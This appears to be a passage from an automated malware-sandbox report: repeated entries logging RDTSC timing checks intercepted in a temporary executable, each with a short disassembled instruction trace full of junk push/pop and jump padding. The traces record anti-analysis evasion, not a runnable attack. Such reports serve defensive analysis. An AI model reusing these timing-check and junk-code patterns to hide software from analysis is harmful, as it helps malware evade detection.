Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EAE44D second address: EAE4F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F473118FE58h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F473118FE58h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 jnl 00007F473118FE5Ch 0x0000004a mov dword ptr fs:[00000000h], esp 0x00000051 mov ebx, dword ptr [ebp+1244CE58h] 0x00000057 mov eax, dword ptr [ebp+122D1499h] 0x0000005d mov ebx, dword ptr [ebp+122D1D5Ch] 0x00000063 push FFFFFFFFh 0x00000065 mov edi, dword ptr [ebp+122D35DEh] 0x0000006b jmp 00007F473118FE67h 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 push edi 0x00000074 jmp 00007F473118FE63h 0x00000079 pop edi 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EBD91D second address: EBD921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EBD921 second address: EBD938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F473118FE61h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EBD938 second address: EBD95D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jng 00007F47311907A6h 0x00000013 jmp 00007F47311907B1h 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EBD95D second address: EBD963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EBD22D second address: EBD244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F47311907B0h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EC434C second address: EC435E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EC442F second address: EC4435 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EC4435 second address: CEC76E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F473118FE63h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 72F248EDh 0x00000012 jmp 00007F473118FE66h 0x00000017 push dword ptr [ebp+122D0631h] 0x0000001d clc 0x0000001e call dword ptr [ebp+122D2363h] 0x00000024 pushad 0x00000025 jmp 00007F473118FE5Eh 0x0000002a or dword ptr [ebp+122D1FF0h], esi 0x00000030 xor eax, eax 0x00000032 add dword ptr [ebp+122D1FF0h], edx 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c stc 0x0000003d mov dword ptr [ebp+122D3486h], eax 0x00000043 mov dword ptr [ebp+122D2EB7h], edi 0x00000049 mov esi, 0000003Ch 0x0000004e jbe 00007F473118FE5Ch 0x00000054 jnp 00007F473118FE57h 0x0000005a cmc 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f or dword ptr [ebp+122D1FF0h], eax 0x00000065 lodsw 0x00000067 stc 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D2EB7h], ebx 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D1FF0h], edx 0x0000007c nop 0x0000007d pushad 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EC9335 second address: EC934C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F47311907A6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jng 00007F47311907A6h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EC9AAC second address: EC9AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F473118FE62h 0x0000000a jmp 00007F473118FE5Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EC9F40 second address: EC9F4F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F47311907AAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EC9F4F second address: EC9F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EC9F55 second address: EC9F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECA220 second address: ECA256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F473118FE66h 0x0000000b popad 0x0000000c jmp 00007F473118FE62h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECA256 second address: ECA25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECA25C second address: ECA260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECA260 second address: ECA271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F47311907A6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECA271 second address: ECA278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECA278 second address: ECA284 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47311907AEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5E778 second address: E5E77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5E77E second address: E5E784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5E784 second address: E5E788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5E788 second address: E5E796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5E796 second address: E5E79A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECF2C2 second address: ECF2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECF2CE second address: ECF2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ecx 0x00000007 push esi 0x00000008 jo 00007F473118FE56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECF46D second address: ECF484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47311907B0h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECF484 second address: ECF4B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE65h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F473118FE62h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECEAF3 second address: ECEB09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECEB09 second address: ECEB10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECF810 second address: ECF826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECF989 second address: ECF9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jne 00007F473118FE56h 0x0000000b jmp 00007F473118FE67h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECF9AC second address: ECF9C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b ja 00007F47311907A6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECFB39 second address: ECFB56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Dh 0x00000007 jo 00007F473118FE62h 0x0000000d jng 00007F473118FE56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ECFE07 second address: ECFE11 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47311907A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED2E04 second address: ED2E0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED2E0C second address: ED2E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907ABh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED2E1B second address: ED2E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F473118FE56h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED8AEC second address: ED8AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED7610 second address: ED7616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED7616 second address: ED761B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED7DB5 second address: ED7DCD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F473118FE5Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED7DCD second address: ED7DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED83C2 second address: ED83CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F473118FE56h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED851E second address: ED8526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED8526 second address: ED852B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED852B second address: ED8541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F47311907A6h 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F47311907A6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: ED8541 second address: ED8545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5B140 second address: E5B144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5B144 second address: E5B15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F473118FE5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5B15A second address: E5B15E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B09B second address: E9B0FD instructions: 0x00000000 rdtsc 0x00000002 js 00007F473118FE58h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F473118FE61h 0x00000014 pop edi 0x00000015 jnc 00007F473118FE5Ch 0x0000001b popad 0x0000001c nop 0x0000001d call 00007F473118FE62h 0x00000022 mov di, 9C38h 0x00000026 pop ecx 0x00000027 lea eax, dword ptr [ebp+12481E4Bh] 0x0000002d mov ecx, dword ptr [ebp+122D35AAh] 0x00000033 mov edi, dword ptr [ebp+122D2C78h] 0x00000039 push eax 0x0000003a jc 00007F473118FE6Eh 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B4BA second address: E9B4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B4C3 second address: E9B4C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B667 second address: E9B695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ecx 0x00000009 jng 00007F47311907A8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F47311907B5h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B695 second address: E9B6B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F473118FE67h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B6B9 second address: E9B6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B6BD second address: E9B6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B6C3 second address: E9B6CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F47311907A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B8BD second address: E9B8C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F473118FE56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B8C7 second address: E9B8CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B8CB second address: E9B8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F473118FE67h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B8ED second address: E9B903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B903 second address: E9B925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jnp 00007F473118FE56h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F473118FE60h 0x00000018 jmp 00007F473118FE5Ah 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B925 second address: E9B93A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47311907A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9B93A second address: E9B93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9BA8E second address: E9BA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9BA92 second address: E9BACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F473118FE69h 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2FB5h], eax 0x00000013 push 00000004h 0x00000015 mov edi, dword ptr [ebp+122D2EEDh] 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push edi 0x00000022 pop edi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9BF26 second address: E9BF30 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47311907A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9C2EC second address: E9C2F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F473118FE56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE0C4F second address: EE0C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE0C53 second address: EE0C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE0F48 second address: EE0F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47311907ACh 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE10BD second address: EE10D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F473118FE5Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE1251 second address: EE1263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F47311907A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE1263 second address: EE1267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EE1267 second address: EE1279 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jl 00007F47311907C2h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5CCD3 second address: E5CCDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5CCDF second address: E5CCE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5CCE3 second address: E5CD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jl 00007F473118FE9Ch 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F473118FE63h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
